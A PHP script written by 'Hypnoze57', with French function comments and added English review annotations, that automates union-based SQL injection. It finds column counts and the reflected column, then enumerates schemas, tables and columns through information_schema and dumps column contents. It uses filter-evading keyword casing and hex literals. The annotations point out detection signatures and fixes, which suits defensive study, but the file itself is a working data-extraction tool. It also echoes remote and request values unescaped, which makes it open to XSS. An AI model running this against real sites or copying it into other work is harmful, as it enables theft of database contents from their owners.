- <?php
- ##############################
- # Fonctions de requettes SQL #
- # Coder par Hypnoze57 #
- ##############################
- #Recherche du nombre de colonne;
- function nb_col($url) { # Column-count probe: returns the last ORDER BY index (1..50) tried before an error string showed up in the response.
- for($i=1;$i<=50;$i++) { # Up to 50 sequential requests; in access logs this is a burst of ORDER BY 1,2,3,... against one parameter from one client.
- $page = file_get_contents($url . '+OrDeR+bY+' . $i . '--+-'); # $url is fetched as given, so the host running this script makes the outbound request. Keyword casing is presumably meant to slip past case-sensitive filters; detection rules should match case-insensitively.
- if(preg_match("#Unknown column|on line|Warning MySQL#", $page)) { # Depends on the target printing database/PHP error text into the page; suppressing error output on the target removes this oracle.
- $col_nb = $i -1;
- break;
- }
- }
- return $col_nb; # NOTE(review): $col_nb is never assigned when no response matches the error pattern.
- }
- #Première injection;
- function injection($url, $nb_col) { # Pure string builder (sends nothing): returns $url with a UNION SELECT of the integers 1..$nb_col appended.
- $chaine = '';
- for($i=1;$i<=$nb_col;$i++) {
- $chaine .= $i.','; # Accumulates "1,2,...,n," - one numeric placeholder per column.
- }
- $chaine = substr($chaine, 0, -1); # Drops the trailing comma.
- $url .= '+UniOn+SeLecT+'.$chaine.'--+-'; # The "--+-" suffix decodes to an SQL line comment that cuts off the rest of the original query. A UNION SELECT of bare sequential integers in a query string is a strong detection signal; parameterized queries on the target make the appended text inert.
- return $url;
- }
- #Recherche de la colonne vulnérable;
- function string_col($url, $nb_col) { # Finds which UNION column is echoed back in the page: returns the first index whose replacement marker appears in the response.
- for($i=1;$i<=$nb_col;$i++) {
- $str = str_replace(','.$i.',', ',0x4879706E6F7A653537,', $url); # 0x4879706E6F7A653537 is the hex encoding of "Hypnoze57"; this fixed literal in request URLs is an indicator for this script.
- $page = file_get_contents($str);
- if(preg_match("#Hypnoze57#", $page)) { # A hit means the target renders that query column into its HTML, i.e. query results are reflected to the client.
- $str_col = $i;
- break;
- }
- }
- return $str_col; # NOTE(review): $str_col is never assigned when the marker is not reflected for any index.
- }
- #Recherche de l'user et de la version de la bdd;
- function find_vers_user($url, $str_col) { # Requests the database version and current user through the reflected column and prints both; returns nothing.
- $url = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,VerSion(),0x3A2F6835373A),', $url); # 0x3A6835373A is ":h57:" and 0x3A2F6835373A is ":/h57:"; the pair delimits the value so it can be cut out of the page. Both hex literals are usable as request-side signatures.
- $pg = file_get_contents($url);
- preg_match('#:h57:(.*):/h57:#', $pg, $version);
- $url = str_replace('VerSion()', 'UseR()', $url); # Same URL with the function swapped, so a second request follows immediately after the first.
- $pg = file_get_contents($url);
- preg_match('#:h57:(.*):/h57#', $pg, $user); # This pattern has no trailing colon, unlike the one used for the version.
- echo 'Version : <font color="red">'.$version[1].'</font><br />User : <font color="red">'.$user[1].'</font><br /><br />'; # Text taken from the remote response is written into this page unescaped, and index 1 is read without checking that either match succeeded.
- }
- #Recherche des bases de données;
- function find_db($url, $str_col, $url_dep) { # Lists schema names read from information_schema and prints each as a link back to this script with db set.
- $db = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,SchEmA_NamE,0x3A2F6835373A),', $url);
- $db = str_replace('--+-', '+FroM+iNForMaTion_SchEmA.SchEmAta--+-', $db); # A web request that names information_schema.schemata is rarely legitimate; a least-privilege database account limits what this enumeration can return.
- $page = file_get_contents($db);
- $page = str_replace(',', '', $page); # Strips every comma from the fetched page so the delimiters sit back to back for the explode() below.
- preg_match('#:h57:(.*):/h57:#', $page, $db_name);
- $bdd = explode(':/h57::h57:', $db_name[1]);
- foreach ($bdd as $base) {
- echo '<a href="?url='.urlencode($url_dep).'&db='.$base.'">'.$base.'</a><br />'; # $base comes from the remote response and is written into both the href and the link text without escaping.
- }
- }
- #Recherche des tables;
- function find_tbl($url, $str_col, $url_dep) { # When ?db= is present, lists that schema's table names from information_schema and prints them as links.
- if(isset($_GET['db'])) {
- echo '<br /><u>Tables de la base '.$_GET['db'].' : </u><br /><br />'; # $_GET['db'] is written into the HTML unescaped (reflected XSS in this page); find_col wraps the equivalent value in htmlspecialchars().
- $tbl = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,TabLe_NaMe,0x3A2F6835373A),', $url);
- $db = str2hex($_GET['db']); # The schema name is sent as a 0x... hex literal, so no quote characters appear in the request; filters that only look for quotes will not see it.
- $bd = $_GET['db'];
- $tbl = str_replace('--+-', '+FroM+iNForMaTion_SchEmA.TabLes+where+TabLe_SchEmA='.$db.'--+-', $tbl);
- $page = file_get_contents($tbl);
- preg_match('#:h57:(.*):/h57:#', $page, $tbl_name);
- $tables = explode(':/h57:,:h57:', $tbl_name[1]);
- foreach($tables as $tbl_fin) {
- echo '<a href="?url='.urlencode($url_dep).'&db='.$bd.'&tbl='.$tbl_fin.'">'.$tbl_fin.'</a><br />'; # Both the request parameter ($bd) and the remote value ($tbl_fin) are emitted without escaping.
- }
- }
- }
- #Recherche des colonnes;
- function find_col($url, $str_col, $url_dep) { # When ?tbl= is present, lists that table's column names from information_schema and prints them as links.
- if(isset($_GET['tbl'])) {
- echo '<br /><u>Colonnes de la table '.htmlspecialchars($_GET['tbl']).' :</u><br /><br />'; # The heading is escaped here, unlike the links printed further down.
- $db = str2hex($_GET['db']); # $_GET['db'] is read without an isset() check; only tbl is tested above.
- $tbl = str2hex($_GET['tbl']);
- $url = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,column_name,0x3A2F6835373A),', $url);
- $url = str_replace('--+-', '+FroM+iNForMaTion_ScheMa.columNs+WhErE+tablE_scheMa='.$db.'+AnD+TablE_nAme='.$tbl.'--+-', $url); # Schema and table are passed as hex literals; information_schema.columns in a query string is the signature to alert on.
- $pg = file_get_contents($url);
- preg_match('#:h57:(.*):/h57:#', $pg, $col_name);
- $colonne = explode(':/h57:,:h57:', $col_name[1]);
- foreach($colonne as $col_fin) {
- echo '<a href="?url='.urlencode($url_dep).'&db='.$_GET['db'].'&tbl='.$_GET['tbl'].'&col='.$col_fin.'">'.$col_fin.'</a><br />'; # Request parameters and the remote value $col_fin go into the markup unescaped.
- }
- }
- }
- #Recherche du contenu;
- function find_content($url, $str_col, $url_dep) { # When ?col= is present, reads that column from db.tbl through the reflected column and prints every value.
- if(isset($_GET['col'])) {
- echo '<br /><u>Contenu de la colonne '.htmlspecialchars($_GET['col']).' dans la table '.htmlspecialchars($_GET['tbl']).' :</u><br /><br />';
- $url = str_replace(','.$str_col.',', ',GrouP_CoNcaT(0x3A6835373A,'.$_GET['col'].',0x3A2F6835373A),', $url); # The col parameter is pasted into the generated URL as-is, with no hex or URL encoding.
- $url = str_replace('--+-', '+FroM+'.$_GET['db'].'.'.$_GET['tbl'].'--+-', $url); # db and tbl are likewise used raw, and are read without isset() checks. This is the data-extraction step: the read only succeeds if the application's database account has SELECT on the named schema.table.
- $pg = file_get_contents($url);
- preg_match('#:h57:(.*):/h57:#', $pg, $content);
- $contents = explode(':/h57:,:h57:', $content[1]);
- foreach($contents as $content_fin) {
- echo '<font color="red">'.$content_fin.'</font><br />'; # Extracted values are written to the page unescaped, so stored markup in the remote data would render in the viewer's browser.
- }
- }
- }
- #Fonction de conversion de table (exemple : admin = 0x61646d696e) - fonction coder par Luxerails;
- function str2hex($str) { # Returns "0x" followed by the hexadecimal form of each byte of $str, e.g. admin gives 0x61646d696e (the example from the author's comment).
- $strout = '0x';
- for ($i=0; $i < strlen($str); $i++) { # strlen() counts bytes, so multi-byte characters are encoded byte by byte.
- $strout .= dechex(ord($str{$i})); # The curly-brace string offset $str{$i} was deprecated in PHP 7.4 and removed in PHP 8.0, where it is a parse error.
- }
- return $strout;
- }
- ?>